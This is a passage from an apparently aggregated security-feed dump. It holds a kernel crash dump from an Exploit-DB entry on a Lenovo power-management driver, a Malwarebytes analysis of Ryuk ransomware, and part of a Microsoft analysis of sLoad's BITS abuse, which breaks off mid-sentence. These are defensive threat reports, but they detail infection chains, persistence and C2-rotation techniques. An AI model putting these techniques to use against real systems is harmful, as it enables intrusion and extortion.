rdi=0000000000000000\r\nrip=fffff8041f0d7c24 rsp=ffffc709dee8ec20 rbp=ffffc709dee8f150\r\n r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000\r\nr11=000000001f0b5000 r12=000000000010001f r13=ffffca04c1ca8d40\r\nr14=ffffc709dee8f4b0 r15=0000000000000000\r\niopl=0 nv up ei ng nz na pe nc\r\ncs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282\r\nnt!ExReleaseAutoExpandPushLockExclusive+0x264:\r\nfffff804`1f0d7c24 84c0 test al,al\r\n_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _\r\n06 ffffc709`dee8f2d0 fffff804`1f276cae nt!setjmpex+0x7fe2\r\n06 ffffc709`dee8f2d0 fffff804`1f276cae nt!setjmpex+0x7fe2\r\nrax=ffffc709dee8e420 rbx=ffffca04ca8f80a0 rcx=000000000000003b\r\nrdx=00000000c0000005 rsi=ffffca04ca8f8170 rdi=0000000000000000\r\nrip=fffff8041f27a9c2 rsp=ffffc709dee8f2d0 rbp=ffffc709dee8f530\r\n r8=fffff80428bf109d 
r9=ffffc709dee8ec50 r10=0000000000000000\r\nr11=000000001f0b5000 r12=0000000000000000 r13=ffffca04c1ca8d40\r\nr14=0000000000000002 r15=0000000000000000\r\niopl=0 nv up ei ng nz na pe nc\r\ncs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282\r\nnt!setjmpex+0x7fe2:\r\nfffff804`1f27a9c2 488d8c2400010000 lea rcx,[rsp+100h]\r\n_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _\r\n07 ffffc709`dee8f4b0 fffff804`28bf109d nt!setjmpex+0x42ce\r\n07 ffffc709`dee8f4b0 fffff804`28bf109d nt!setjmpex+0x42ce\r\nrax=ffffc709dee8e420 rbx=ffffca04ca8f80a0 rcx=000000000000003b\r\nrdx=00000000c0000005 rsi=ffffca04ca8f8170 rdi=0000000000000000\r\nrip=fffff8041f276cae rsp=ffffc709dee8f4b0 rbp=ffffc709dee8f530\r\n r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000\r\nr11=000000001f0b5000 r12=0000000000000000 r13=ffffca04c1ca8d40\r\nr14=0000000000000002 r15=0000000000000000\r\niopl=0 nv up ei ng nz na pe nc\r\ncs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282\r\nnt!setjmpex+0x42ce:\r\nfffff804`1f276cae 440f20c0 mov rax,cr8\r\n_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _\r\n08 ffffc709`dee8f640 fffff804`28bf5060 pmdrvs+0x109d\r\n08 ffffc709`dee8f640 fffff804`28bf5060 pmdrvs+0x109d\r\nrax=fffff80428bf5020 rbx=ffffca04ca8f80a0 rcx=ffffc709dee8f6d8\r\nrdx=ffffca04ca8f8170 rsi=ffffca04ca8f8170 rdi=0000000000000000\r\nrip=fffff80428bf109d rsp=ffffc709dee8f640 rbp=ffffca04cc188290\r\n r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020\r\nr11=ffffc709dee8f6b8 r12=0000000000000000 r13=ffffca04c1ca8d40\r\nr14=0000000000000002 r15=0000000000000000\r\niopl=0 nv up ei ng nz na pe nc\r\ncs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282\r\npmdrvs+0x109d:\r\nfffff804`28bf109d 8b07 mov eax,dword ptr [rdi] ds:002b:00000000`00000000=????????\r\n_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _\r\n09 ffffc709`dee8f6c0 fffff804`1f12dba9 pmdrvs+0x5060\r\n09 ffffc709`dee8f6c0 fffff804`1f12dba9 pmdrvs+0x5060\r\nrax=fffff80428bf5020 rbx=ffffca04ca8f80a0 rcx=ffffc709dee8f6d8\r\nrdx=ffffca04ca8f8170 
rsi=0000000000000001 rdi=0000000000000000\r\nrip=fffff80428bf5060 rsp=ffffc709dee8f6c0 rbp=ffffca04cc188290\r\n r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020\r\nr11=ffffc709dee8f6b8 r12=0000000000000000 r13=ffffca04c1ca8d40\r\nr14=0000000000000002 r15=0000000000000000\r\niopl=0 nv up ei ng nz na pe nc\r\ncs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282\r\npmdrvs+0x5060:\r\nfffff804`28bf5060 eb28 jmp pmdrvs+0x508a (fffff804`28bf508a)\r\n_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _\r\n0a ffffc709`dee8f6f0 fffff804`1f6abb11 nt!IofCallDriver+0x59\r\n0a ffffc709`dee8f6f0 fffff804`1f6abb11 nt!IofCallDriver+0x59\r\nrax=fffff80428bf5020 rbx=ffffca04ca8f80a0 rcx=ffffc709dee8f6d8\r\nrdx=ffffca04ca8f8170 rsi=0000000000000001 rdi=ffffca04cc188290\r\nrip=fffff8041f12dba9 rsp=ffffc709dee8f6f0 rbp=ffffca04cc188290\r\n r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020\r\nr11=ffffc709dee8f6b8 r12=0000000000000000 r13=ffffca04c1ca8d40\r\nr14=0000000000000002 r15=0000000000000000\r\niopl=0 nv up ei ng nz na pe nc\r\ncs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282\r\nnt!IofCallDriver+0x59:\r\nfffff804`1f12dba9 4883c438 add rsp,38h\r\n_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _\r\n0b ffffc709`dee8f730 fffff804`1f6d763c nt!NtQueryInformationFile+0x1071\r\n0b ffffc709`dee8f730 fffff804`1f6d763c nt!NtQueryInformationFile+0x1071\r\nrax=fffff80428bf5020 rbx=ffffca04ca8f80a0 rcx=ffffc709dee8f6d8\r\nrdx=ffffca04ca8f8170 rsi=0000000000000001 rdi=ffffca04cc188290\r\nrip=fffff8041f6abb11 rsp=ffffc709dee8f730 rbp=ffffca04cc188290\r\n r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020\r\nr11=ffffc709dee8f6b8 r12=0000000000000000 r13=ffffca04c1ca8d40\r\nr14=0000000000000002 r15=0000000000000000\r\niopl=0 nv up ei ng nz na pe nc\r\ncs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282\r\nnt!NtQueryInformationFile+0x1071:\r\nfffff804`1f6abb11 448bf0 mov r14d,eax\r\n_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _\r\n0c ffffc709`dee8f7e0 fffff804`1f64c356 
nt!NtClose+0xffc\r\n0c ffffc709`dee8f7e0 fffff804`1f64c356 nt!NtClose+0xffc\r\nrax=fffff80428bf5020 rbx=ffffca04cc188290 rcx=ffffc709dee8f6d8\r\nrdx=ffffca04ca8f8170 rsi=0000000000000000 rdi=ffffca04ca8f80a0\r\nrip=fffff8041f6d763c rsp=ffffc709dee8f7e0 rbp=ffffc709dee8fa80\r\n r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020\r\nr11=ffffc709dee8f6b8 r12=ffffca04ca8f81b8 r13=fffff780000002dc\r\nr14=0000000000000000 r15=0000000000000000\r\niopl=0 nv up ei ng nz na pe nc\r\ncs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282\r\nnt!NtClose+0xffc:\r\nfffff804`1f6d763c eb25 jmp nt!NtClose+0x1023 (fffff804`1f6d7663)\r\n_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _\r\n0d ffffc709`dee8f920 fffff804`1f27a305 nt!NtDeviceIoControlFile+0x56\r\n0d ffffc709`dee8f920 fffff804`1f27a305 nt!NtDeviceIoControlFile+0x56\r\nrax=fffff80428bf5020 rbx=ffffca04c88b3080 rcx=ffffc709dee8f6d8\r\nrdx=ffffca04ca8f8170 rsi=000000000068fd18 rdi=ffffc709dee8f9a8\r\nrip=fffff8041f64c356 rsp=ffffc709dee8f920 rbp=ffffc709dee8fa80\r\n r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020\r\nr11=ffffc709dee8f6b8 r12=0000000000000000 r13=0000000000000010\r\nr14=0000000000000000 r15=0000000000000000\r\niopl=0 nv up ei ng nz na pe nc\r\ncs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282\r\nnt!NtDeviceIoControlFile+0x56:\r\nfffff804`1f64c356 4883c468 add rsp,68h\r\n_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _\r\n0e ffffc709`dee8f990 00007fff`33aaf844 nt!setjmpex+0x7925\r\n0e ffffc709`dee8f990 00007fff`33aaf844 nt!setjmpex+0x7925\r\nrax=fffff80428bf5020 rbx=ffffca04c88b3080 rcx=ffffc709dee8f6d8\r\nrdx=ffffca04ca8f8170 rsi=000000000068fd18 rdi=ffffc709dee8f9a8\r\nrip=fffff8041f27a305 rsp=ffffc709dee8f990 rbp=ffffc709dee8fa80\r\n r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020\r\nr11=ffffc709dee8f6b8 r12=0000000000000000 r13=0000000000000010\r\nr14=0000000000000000 r15=0000000000000000\r\niopl=0 nv up ei ng nz na pe nc\r\ncs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b 
efl=00000282\r\nnt!setjmpex+0x7925:\r\nfffff804`1f27a305 0f1f00 nop dword ptr [rax]\r\n_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _\r\n0f 00000000`0068fcf8 00000000`00000000 0x00007fff`33aaf844\r\n0f 00000000`0068fcf8 00000000`00000000 0x00007fff`33aaf844\r\nrax=fffff80428bf5020 rbx=0000000000000000 rcx=ffffc709dee8f6d8\r\nrdx=ffffca04ca8f8170 rsi=00000000deadbeef rdi=000000000000004c\r\nrip=00007fff33aaf844 rsp=000000000068fcf8 rbp=000000000000004c\r\n r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020\r\nr11=ffffc709dee8f6b8 r12=0000000000000000 r13=0000000000000010\r\nr14=0000000000000000 r15=0000000000000000\r\niopl=0 nv up ei ng nz na pe nc\r\ncs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282\r\n00007fff`33aaf844 ?? ???\r\n_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _\r\n00 ffffc709`dee8e318 fffff804`1f27a8e9 nt!KeBugCheckEx\r\n\r\n# Mitigation\r\n\r\nUpdate to Lenovo Power Management driver version 1.67.17.48 or higher", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/47771"}], "malwarebytes": [{"lastseen": "2019-12-12T23:25:46", "bulletinFamily": "blog", "description": "_Ryuk_. A name once unique to a fictional character in a popular Japanese comic book and cartoon series is now a name that appears in several rosters of the nastiest ransomware to ever grace the wild web. \n\nFor an incredibly young strain\u2014only 15 months old\u2014Ryuk ransomware gaining such notoriety is quite a feat to achieve. 
Unless the threat actors behind its campaigns call it quits, too\u2014[Remember GandCrab?](<https://blog.malwarebytes.com/threat-spotlight/2019/07/threat-spotlight-sodinokibi-ransomware-attempts-to-fill-gandcrab-void/>)\u2014or law enforcement collars them for good, we can only expect the threat of Ryuk to loom large over organizations.\n\nFirst discovered in mid-August 2018, Ryuk immediately turned heads after [disrupting operations of all Tribune Publishing newspapers](<https://blog.malwarebytes.com/cybercrime/malware/2019/01/ryuk-ransomware-attacks-businesses-over-the-holidays/>) over the Christmas holiday that year. What was initially thought of as a server outage soon became clear to those affected that it was actually a malware attack. It was quarantined eventually; however, Ryuk [re-infected and spread onto connected systems](<https://www.latimes.com/local/lanow/la-me-ln-times-delivery-disruption-20181229-story.html>) in the network because the security patches failed to hold when tech teams brought the servers back.\n\n### Big game hunting with Ryuk ransomware\n\nBefore the holiday attack on Tribune Publishing, Ryuk had been seen targeting various enterprise organizations worldwide, asking ransom payments ranging from 15 to 50 Bitcoins (BTC). That translates to between US$97,000 and $320,000 at time of valuation.\n\nThis method of exclusively targeting large organizations with critical assets that almost always guarantees a high ROI for criminals is called \"big game hunting.\" It\u2019s not easy to pull off, as such targeted attacks also involve the customization of campaigns to best suit targets and, in turn, increase the likelihood of their effectiveness. This requires much more work than a simple \"spray-and-pray\" approach that can capture numerous targets but may not net such lucrative results.\n\nFor threat actors engaged in big game hunting, malicious campaigns are launched in phases. 
For example, they may start with a phishing attack to gather key credentials or drop malware within an organization's network to do extensive mapping, identifying crucial assets to target. Then they might deploy second and third phases of attacks for extended espionage, extortion, and eventual ransom.\n\nTo date, Ryuk ransomware is hailed as the costliest among its peers. According to a report by Coveware, a first-of-its-kind incident response company specializing in ransomware, [Ryuk\u2019s asking price is 10 times the average](<https://www.coveware.com/blog/2019/2/19/ryuk-ransomware-exploring-the-technical-and-human-connections>), yet they also claim that ransoms are highly negotiable. The varying ways adversaries work out ransom payments suggests that there may be more than one criminal group who have access to and are operating Ryuk ransomware. \n\n### The who behind Ryuk\n\nAccurately pinpointing the origin of an attack or malware strain is crucial, as it reveals as much about the threat actors behind attack campaigns as it does the payload itself. The name \u201cRyuk,\u201d which has obvious Japanese ties, is not a factor to consider when trying to discover who developed this ransomware. After all, it's common practice for cybercriminals to use handles based on favorite anime and manga characters. These days, a malware strain is more than its name.\n\nInstead, similarities in code base, structure, attack vectors, and languages can point to relations between criminal groups and their malware families. Security researchers from Check Point found [a connection between the Ryuk and Hermes ransomware strains](<https://research.checkpoint.com/2018/ryuk-ransomware-targeted-campaign-break/>) early on due to similarities in their code and structure, an association that persists up to this day. 
Because of this, many have assumed that Ryuk may also have ties with the [Lazarus Group](<https://blog.malwarebytes.com/threat-analysis/2019/03/the-advanced-persistent-threat-files-lazarus-group/>), the same North Korean [APT](<https://blog.malwarebytes.com/glossary/advanced-persistent-threat-apt/>) group that operated the Hermes ransomware in the past.\n\n* * *\n\n_Recommended read: _[_Hermes ransomware distributed to South Koreans via recent Flash zero-day_](<https://blog.malwarebytes.com/threat-analysis/2018/03/hermes-ransomware-distributed-to-south-koreans-via-recent-flash-zero-day/>)\n\n* * *\n\nHowever, code likeness alone is insufficient basis to support the Ryuk/North Korean ties narrative. Hermes is a ransomware kit that is frequently peddled on the underground market, making it available for other cybercriminals to use in their attack campaigns. Furthermore, separate research from cybersecurity experts at [CrowdStrike](<https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/>), [FireEye](<https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html>), [Kryptos Logic](<https://www.kryptoslogic.com/blog/2019/01/north-korean-apt-and-recent-ryuk-ransomware-attacks/>), and [McAfee](<https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ryuk-ransomware-attack-rush-to-attribution-misses-the-point/>) has indicated that the gang behind Ryuk may actually be of Russian origin\u2014and not necessarily nation-state sponsored.\n\nAs of this writing, the origins of Ryuk ransomware can be attributed (with high confidence, per some of our cybersecurity peers) to two criminal entities: [Wizard Spider](<https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/>) and [CryptoTech](<https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ryuk-ransomware-attack-rush-to-attribution-misses-the-point/>). 
\n\nThe former is the well-known Russian cybercriminal group and operator of [TrickBot](<https://blog.malwarebytes.com/detections/trojan-trickbot/>); the latter is a Russian-speaking organization found selling [Hermes 2.1](<https://www.mcafee.com/blogs/other-blogs/mcafee-labs/taiwan-bank-heist-role-pseudo-ransomware/>) two months before [the $58.5 million cyber heist](<https://www.taiwannews.com.tw/en/news/3544541>) that victimized the Far Eastern International Bank (FEIB) in Taiwan. According to reports, this version of [Hermes was used as a decoy or \"pseudo-ransomware,\"](<https://blog.malwarebytes.com/threat-analysis/2018/03/hermes-ransomware-distributed-to-south-koreans-via-recent-flash-zero-day/>) a mere distraction from the real goal of the attack.\n\n#### Wizard Spider \n\nRecent findings have revealed that Wizard Spider upgraded Ryuk to include a Wake-on-LAN (WoL) utility and an ARP ping scanner in its arsenal. WoL is a network standard that allows computing devices connected to a network\u2014regardless of which operating system they run\u2014to be turned on remotely whenever they're turned off, in sleep mode, or hibernating. \n\nARP pinging, on the other hand, is a way of discovering endpoints in a [LAN](<https://blog.malwarebytes.com/glossary/local-area-network/>) network that are online. According to CrowdStrike, these new additions reveal Wizard Spider's attempts to reach and infect as many of their target's endpoints as they can, demonstrating a persistent focus and motivation to increasingly monetize their victims\u2019 encrypted data.\n\n#### CryptoTech\n\nTwo months ago, Gabriela Nicolao ([@rove4ever](<https://twitter.com/rove4ever>)) and Luciano Martins ([@clucianomartins](<https://twitter.com/clucianomartins>)), both researchers at Deloitte Argentina, attributed Ryuk ransomware to CryptoTech, a little-known cybercriminal group that was observed touting Hermes 2.1 in an underground forum back in August 2017. 
Hermes 2.1, the researchers say, is Ryuk ransomware.\n\nThe CryptoTech post about Hermes version 2.1 on the dark web in August 2017 (Courtesy of McAfee)\n\nIn a Virus Bulletin [conference paper](<https://www.virusbulletin.com/virusbulletin/2019/10/vb2019-paper-shinigamis-revenge-long-tail-ryuk-malware/>) and [presentation](<https://www.virusbulletin.com/conference/vb2019/abstracts/shinigamis-revenge-long-tail-ryuk-malware/>) entitled _Shinigami\u2019s revenge: the long tail of the Ryuk ransomware_, Nicolao and Martins presented evidence to this claim: In June 2018, a couple of months before Ryuk made its first public appearance, an underground forum poster expressed doubt on CryptoTech being the author of Hermes 2.1, the ransomware toolkit they were peddling almost a year ago that time. CryptoTech\u2019s response was interesting, which Nicolao and Martins captured and annotated in the screenshot below.\n\nCryptoTech: Yes, we developed Hermes from scratch.\n\nThe Deloitte researchers also noted that after Ryuk emerged, CryptoTech went quiet.\n\nCrowdStrike has estimated that from the time Ryuk was deployed until January of this year, their operators have netted a total of 705.80 BTC, which is equivalent to US$5 million as of press time.\n\n### Ryuk ransomware infection vectors\n\nThere was a time when Ryuk ransomware arrived on clean systems to wreak havoc. But new strains observed in the wild now belong to a multi-attack campaign that involves [Emotet](<https://blog.malwarebytes.com/detections/trojan-emotet/>) and [TrickBot](<https://blog.malwarebytes.com/detections/trojan-trickbot/>). As such, Ryuk variants arrive on systems pre-infected with other malware\u2014a \"triple threat\" attack methodology. 
\n\nHow the Emotet, TrickBot, and Ryuk triple threat attack works (Courtesy of Cybereason)\n\nThe first stage of the attack starts with a weaponized Microsoft Office document file\u2014meaning, it contains malicious macro code\u2014attached to a [phishing email](<https://blog.malwarebytes.com/101/2017/06/somethings-phishy-how-to-detect-phishing-attempts/>). Once the user opens it, the malicious macro will run `cmd` and execute a PowerShell command. This command attempts to download [Emotet](<https://blog.malwarebytes.com/botnets/2019/09/emotet-is-back-botnet-springs-back-to-life-with-new-spam-campaign/>).\n\nOnce Emotet executes, it retrieves and executes another malicious payload\u2014usually [TrickBot](<https://blog.malwarebytes.com/101/2018/11/trickbot-takes-top-business-threat/>)\u2014and collects information on affected systems. It initiates the download and execution of TrickBot by reaching out to and downloading from a pre-configured remote malicious host.\n\nOnce infected with TrickBot, the threat actors then check if the system is part of a sector they are targeting. If so, they download an additional payload and use the admin credentials stolen using TrickBot to perform lateral movement to reach the assets they wish to infect.\n\nThe threat actors then check for and establish a connection with the target\u2019s live servers via a [remote desktop protocol (RDP)](<https://blog.malwarebytes.com/glossary/remote-desktop-protocol-rdp/>). 
From there, they drop Ryuk.\n\n\n\nSystems infected with the Ryuk ransomware display the following symptoms:\n\n**Presence of ransomware notes.** Ryuk drops the ransom note, _RyukReadMe.html_ or _RyukReadMe.txt_, in every folder where it has encrypted files.\n\nThe HTML file, as you can see from the screenshot above, contains two private email addresses that affected parties can use to contact the threat actors, either to find out how much they need to pay to get access back to their encrypted files or to start the negotiation process.\n\nOn the other hand, the TXT ransom note contains (1) explicit instructions laid out for affected parties to read and comply with, (2) two private email addresses affected parties can contact, and (3) a Bitcoin wallet address. Although email addresses may vary, it was noted that they are all accounts served at Protonmail or Tutanota. It was also [noted](<https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/>) that a day after the unsealing of [the indictment of two ransomware operators](<https://www.justice.gov/opa/pr/two-iranian-men-indicted-deploying-ransomware-extort-hospitals-municipalities-and-public>), Ryuk operators removed the Bitcoin address from their ransom notes, stating that it will be given to those affected once they are contacted via email.\n\nThere are usually two versions of the text ransom note: a polite version, which past research claims is comparable to BitPaymer\u2019s due to certain similar phrasings; and a not-so-polite version.\n\nRyuk ransom notes. 
Left: polite version; Right: not-so-polite version\n\nBitPaymer ransom note: polite version (Courtesy of Coveware) \n\n\nBitPaymer ransom note: not-so-polite version (Courtesy of Symantec)\n\n**Encrypted files with the RYK string attached to extension names.** Ryuk uses a combination of symmetric (via the use of [AES](<https://searchsecurity.techtarget.com/definition/Advanced-Encryption-Standard>)) and asymmetric (via the use of [RSA](<https://searchsecurity.techtarget.com/definition/RSA>)) encryption to encode files. A private key, which only the threat actor can supply, is needed to properly decrypt files.\n\nEncrypted files will have the .ryk file extension appended to the file names. For example, an encrypted _sample.pdf_ and _sample.mp4_ files will have the _sample.pdf.ryk_ and _sample.mp4.ryk_ file names, respectively.\n\nThis scheme is effective, assuming that each Ryuk strain was tailor-made for their target organization.\n\nWhile Ryuk encrypts files on affected systems, it avoids files with the extension .exe, .dll, and .hrmlog (a file type associated with Hermes). Ryuk also avoids encrypting files in the following folders:\n\n * AhnLab \n * Chrome\n * Microsoft\n * Mozilla\n * Recycle.bin\n * Windows\n\n## Protect your system from Ryuk\n\nMalwarebytes continues to track Ryuk ransomware campaigns, protecting our business users with real-time anti-malware and anti-ransomware technology, as well as [signature-less detection](<https://www.malwarebytes.com/business/endpointprotectionandresponse/>), which stops the attack earlier on in the chain. 
In addition, we protect against triple threat attacks aimed at delivering Ryuk as a final payload by blocking downloads of Emotet or TrickBot.\n\n\n\nWe recommend IT administrators take the following actions to secure against and mitigate Ryuk ransomware attacks:\n\n * Educate every employee in the organization, including executives, on how to correctly handle [suspicious emails](<https://blog.malwarebytes.com/101/2018/06/five-easy-ways-to-recognize-and-dispose-of-malicious-emails/>).\n * Limit the use of privileged accounts to only a select few in the organization.\n * Avoid using [RDPs](<https://blog.malwarebytes.com/security-world/business-security-world/2018/08/protect-rdp-access-ransomware-attacks/>) without properly terminating the session.\n * Implement the use of a [password manager](<https://blog.malwarebytes.com/awareness/2019/10/when-can-we-get-rid-of-passwords-for-good/>) and single sign-on services for company-related accounts. Do away with other insecure password management practices.\n * Deploy an authentication process that works for the company.\n * Disable unnecessary share folders, so that in the event of a Ryuk ransomware attack, the malware is prevented from moving laterally in the network.\n * Make sure that all software installed on endpoints and servers is up to date and [all vulnerabilities are patched](<https://blog.malwarebytes.com/101/2018/12/how-threat-actors-are-using-smb-vulnerabilities/>). Pay particular attention to patching CVE-2017-0144, a remote code-execution vulnerability. 
This will prevent TrickBot and other malware exploiting this weakness from spreading.\n * Apply attachment filtering to email messages.\n * Disable macros across the environment.\n\nFor a list of technologies and operations that have been found to be effective against Ryuk ransomware attacks, you can go [here](<https://blog.malwarebytes.com/cybercrime/malware/2019/01/ryuk-ransomware-attacks-businesses-over-the-holidays/>).\n\n## Indicators of Compromise (IOCs)\n\nTake note that professional cybercriminals sell Ryuk to other criminals on the black market as a toolkit for threat actors to build their own strain of the ransomware. As such, one shouldn\u2019t be surprised by the number of Ryuk variants that are wreaking havoc in the wild. Below is a list of file hashes that we have seen so far:\n\n * cb0c1248d3899358a375888bb4e8f3fe\n * d4a7c85f23438de8ebb5f8d6e04e55fc\n * 3895a370b0c69c7e23ebb5ca1598525d\n * 567407d941d99abeff20a1b836570d30\n * c0d6a263181a04e9039df3372afb8016 \n\nAs always\u2014stay safe, everyone! 
\n\nThe post [Threat spotlight: The curious case of Ryuk ransomware](<https://blog.malwarebytes.com/threat-spotlight/2019/12/threat-spotlight-the-curious-case-of-ryuk-ransomware/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "modified": "2019-12-12T22:33:53", "published": "2019-12-12T22:33:53", "id": "MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34", "href": "https://blog.malwarebytes.com/threat-spotlight/2019/12/threat-spotlight-the-curious-case-of-ryuk-ransomware/", "type": "malwarebytes", "title": "Threat spotlight: The curious case of Ryuk ransomware", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "mssecure": [{"lastseen": "2019-12-12T21:51:01", "bulletinFamily": "blog", "description": "Many of today\u2019s threats evolve to incorporate as many [living-off-the-land](<https://www.microsoft.com/security/blog/2019/09/26/bring-your-own-lolbin-multi-stage-fileless-nodersok-campaign-delivers-rare-node-js-based-malware/>) techniques as possible into the attack chain. The PowerShell-based downloader Trojan known as sLoad, however, puts all its bets on BITS.\n\nBackground Intelligent Transfer Service (BITS) is a component of the Windows operating system that provides an ability to transfer files in an asynchronous and throttled fashion using idle bandwidth. Abusing BITS, which provides the ability to create self-contained jobs that can be prioritized and queued up and that can launch other programs, has become a prevalent attack technique. 
Recent sophisticated malware campaigns like [Astaroth](<https://www.microsoft.com/security/blog/2019/07/08/dismantling-a-fileless-campaign-microsoft-defender-atp-next-gen-protection-exposes-astaroth-attack/>) have found success in the use of BITS for downloading payloads or additional components, especially in systems where the firewall is not configured to block malicious traffic from BITS jobs.\n\nsLoad, detected by Windows Defender Antivirus as TrojanDownloader:PowerShell/sLoad, is used by adversaries for exfiltrating system information and delivering additional payloads in targeted attacks. It has been around for a few years and has not stopped evolving. What hasn\u2019t changed, though, is its use of BITS for all of its exfiltration activities, as well as command-and-control (C2) communications from handshake to downloading additional payloads.\n\nOnce sLoad has infiltrated a machine, it can allow attackers to take further, potentially more damaging actions. Using exfiltrated information, attackers can identify what security solutions are running and test payloads before they are sneaked into the compromised system or, worse, high-priced targets. sLoad uses scheduled tasks, which run the malware every three minutes, opening the window of opportunity for further compromise\u2014hence raising the risk for the affected machine\u2014every time it runs. We have already seen the malware attempt to deliver several other, potentially more dangerous Trojans to compromised machines.\n\nWhile several malware campaigns have leveraged BITS, sLoad\u2019s almost exclusive use of the service is notable. sLoad uses BITS as an alternative protocol to perform data exfiltration and most of its other malicious activities, enabling the malware to evade defenders and protections that may not be inspecting this unconventional protocol. 
Cloud-based machine learning-driven [behavioral blocking and containment](<https://www.microsoft.com/security/blog/2019/10/08/in-hot-pursuit-of-elusive-threats-ai-driven-behavior-based-blocking-stops-attacks-in-their-tracks/>) capabilities in [Microsoft Defender Advanced Threat Protection](<https://www.microsoft.com/en-us/WindowsForBusiness/windows-atp>) detect and block sLoad\u2019s activities as Behavior:Win32/sLoad.A.\n\n\n\nIn this blog we\u2019ll share our analysis of the multiple ways in which sLoad is abusing BITS and share how Microsoft Defender Advanced Threat Protection defeats these advanced malware techniques.\n\n## Stealthy installation via multiple cascaded scripts\n\nsLoad is known to infect machines using spear-phishing emails and a common but effective detection evasion technique: the cascaded scripts. One script drops or downloads one or more scripts, passes control to one of these scripts, and repeats the process multiple times until the final component is installed.\n\nOver time, we\u2019ve seen some variations of this technique. One sLoad campaign used the link target field of a LNK file to run PowerShell commands that extracts and runs the first-stage PowerShell code, which is appended to the end of the LNK file or, in one instance, the end of the ZIP file that originally contained the LNK file. In another campaign, the first-stage PowerShell code itself uses a download BITS job to download either the sLoad script and the C2 URL file or the sLoad dropper PowerShell script that embeds the encrypted sLoad script and C2 URL file within itself.\n\nIn the most recent attacks, for the first stage, sLoad shifted from using PowerShell script to VBScript. The randomly named VBScript file is simply a proxy that builds and then drops and runs a PowerShell script, always named _rr.ps1_. 
This is none other than the same sLoad PowerShell dropper mentioned earlier that embeds the encrypted sLoad script and C2 URL file within itself.\n\nIn most variations of the installation, the sLoad dropper script is the last intermediate stage that performs the following actions, and eventually decrypts and runs the final sLoad script:\n\n 1. Creates an installation folder in the _%APPDATA%_ folder named after the first 6 characters of the Win32 Product UUID. \n 2. Drops an infection marker file named _in_, and during subsequent executions, uses the _LastWriteTime_ on this file to check whether the malware was installed within the last 30 minutes, in which case it terminates. \n 3. Drops the encrypted sLoad script and the C2 URL file as _config.ini_ and _web.ini_, respectively. \n 4. Builds and drops two more randomly named scripts: one VBScript and one PowerShell script. \n 5. Uses _schtasks.exe_ to create a scheduled task named _AppRunLog_ to run the randomly named VBScript from the previous step with the decryption key supplied as a command line parameter; deletes the previously created related tasks (if found) before creating this one. The scheduled task is configured to start at 7:00 AM and run every 3 minutes. \n\nThe dropped VBScript that runs under the scheduled task is yet another proxy that simply runs the dropped PowerShell script with the same command line parameter (the decryption key). The PowerShell script decrypts the contents of the previously dropped _config.ini_ in memory into another piece of PowerShell code, which it then runs. 
This is the final component, the script detected as TrojanDownloader:PowerShell/sLoad, that uses BITS to perform every important malicious activity.\n\n## BITS abuse\n\nThe sLoad PowerShell script (the final component) then abuses BITS to carry out all of the following activities:\n\n### Finding an active C2 server\n\nThe malware decrypts the contents of the previously dropped _web.ini_ into a set of 2 URLs and creates BITS download jobs to test the connection to these URLs. It then saves the URL that responds with a file containing the message \u201csok\u201d, downloaded as part of the created BITS job. This ensures that the handshake is complete.\n\nIf none responds, the script appends the number \u201c1\u201d to the domain names in both URLs, saves the encrypted data back to the _web.ini_ file, and exits from the script. As a result, the next time the scheduled job runs, the script uses the modified _web.ini_ to obtain the modified URLs to attempt connecting to an active C2. With each unsuccessful attempt at connecting with C2s, the number appended to the domain names is increased by increments of 1 until it reaches 50, at which time it resets to 1. This technique offers a bit of a cushion and ensures continued contact between a compromised machine and a C2, in case the primary C2 is blocked.\n\nThis prevents the malware infrastructure from losing a compromised host if the primary C2 is blocked. It\u2019s also interesting to see how the URLs used to reach C2 are structured to appear related to CAPTCHA verification, an attempt to escape watchful eyes.\n\n\n\n### Fetching a new list of C2s\n\nFor continued exfiltration of information, 